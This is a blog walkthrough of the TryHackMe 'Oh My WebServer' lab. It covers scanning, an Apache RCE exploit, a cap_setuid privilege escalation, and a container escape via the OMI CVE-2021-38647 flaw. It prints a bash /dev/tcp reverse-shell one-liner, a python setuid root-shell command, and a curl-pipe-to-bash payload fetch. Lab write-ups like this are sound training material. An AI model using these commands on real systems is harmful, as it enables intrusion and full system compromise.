Open in app

Sign in

Write

Sign in

Oh My WebServer TryHackMe Walkthrough

introduction

Musyoka Ian
6 min readMar 5, 2022

Hello guys back again with another walkthrouh this time am going to be exploiting Oh My WebServer from TyrHackMe. The box was really well structured thanks to the author of the box tinyb0y. The box starts of by performing a nmap scan and discovering that the box is running a vulnerable Apache web server and using an exploit we get a shell on the system. Doing a little bit of enumeration we discovered that we landed on a docker container and not the host operating system. Using linpeas we discover that python has the cap_setuid capability set and we can exploit this to get root on the docker container. Then we’ll use CVE-2021–38647 to escalate to the root OS and read the root flag. without much say let jump in

As always we’ll start of by performing a nmap scan. This will give us a better understanding of the services that are running on the box

Looking at the screenshot below we discover that 2 port are open

  1. Secure shell (SSH) running on port 22
  2. Apache web server (HTTP) running on port 80

SSH requires us to have correct credentials to access it and since we are in the initial stages of enumeration we don’t even have a correct name of a user that we know exists on the system meaning we really can’t do much with SSH at the moment hence i decided to enumerate HTTP

The other interesting information given to us by nmap is version information!. Looking at the version of Apache server that’s running we can come to a conclusion that it’s vulnerable to a remote code execution (RCE). This is a vulnerability that allows execution of arbitrary commands on a system. Looking for an exploit online we get one in exploitdb.

I copied the exploit to my box and run it using the arguments requires and looking at the screenshot below we get the output back

The argument targets.txt — was just a file on my system which contained the IP Address of the vulnerable system

The fact that we see the output means that our exploit works . This is an example of a classic command injection. In other occasions you’ll find that a system is vulnerable but you don’t get an output(blind remote code execution) and might assume a system was not vulnerable but what you got was a false negative that’s why i prefer performing a ping request back to my system. Depending on seeing the output might sometimes lead you to a rabbit hole but in our case we did need to perform a ping request

Next step is getting a shell on the system. i just used a one liner bash reverse shell to get a shell on the system

bash -c 'bash -i >& /dev/tcp/10.8.2.58/9001 0>&1'

Before running the command i did set up a netcat listener on port 9001 on my kali box

Then executed the exploit with the bash reverse shell. Looking at the screenshot below we get a shell on the system

Nice. Looking at the root of the file system we see a file .dockerenv that informs us that we are inside a docker container

The same information can be gotten from the IP Address of the system.

The IP Address 172.17.*.* most likely will belong to a docker container. In the docker container we are running as the user daemon. Next step is probably escalating our privilege to the root user on the system. I uploaded linpeas to the system and ran it.

Looking at linpeas result we see that python3 has the cap_setuid capability set

Looking at GTFOBINs we get a one liner command that will exploit the misconfiguration and get us a root shell on the system

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Running the command on the system we get a root shell on the docker container

Going to the root’s user home directory we get the user.txt flag

We can submit the flag on TryHackMe and earn the points. Next step is somehow escaping the docker container and getting a root shell on the host OS.

Next i uploaded nmap to the box and scanned the gateway which had an IP Address of 172.17.0.1.

This reason as to why i did this was because other enumeration with linpeas didn’t yield much results.

Looking at the results returned by nmap we see that port 5986 is open

The port is usually used for windows remoting and the year 2021 it had an exploit for linux boxes

Looking though articles we discover that the OMI agent runs as root with the highest privileges on the system meaning if we successfully exploit it we’ll become root on the host system. Looking at the temp folder we get an exploit called omi.py left on the system

I guess the author of the box forgot to clean up or didn’t not really sure

But the exploit requires us to specify target and a command to be ran

First i created another netcat listener on port 9001

Next i created a bash script containing my bash reverse shell and named the script shell.sh

Next i started a web server on port 8000 that will host my bash reverse shell payload

lastlt I specified a target and a command to be ran which was my bash reverse shell command hosted on my system. THe command that i used was

python3 omi.py -t 172.17.0.1 -c "curl 10.8.2.58:8000/shell.sh | bash"

Looking at the screenshot below i got a root shell on the hosts system

I navigated to the root folder and got the root flag

Now we can submit the flag and get the final points. And the box is pretty much done!!!

I hope you enjoyed the walkthrough if so clap for me down below and follow me so that you won’t miss any upcoming walkthroughs

Oh My Webserver
Tryhackme Walkthrough
Omigod Exploit
Docker
Remote Code Execution

--

--

Musyoka Ian

Written by Musyoka Ian

706 Followers

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams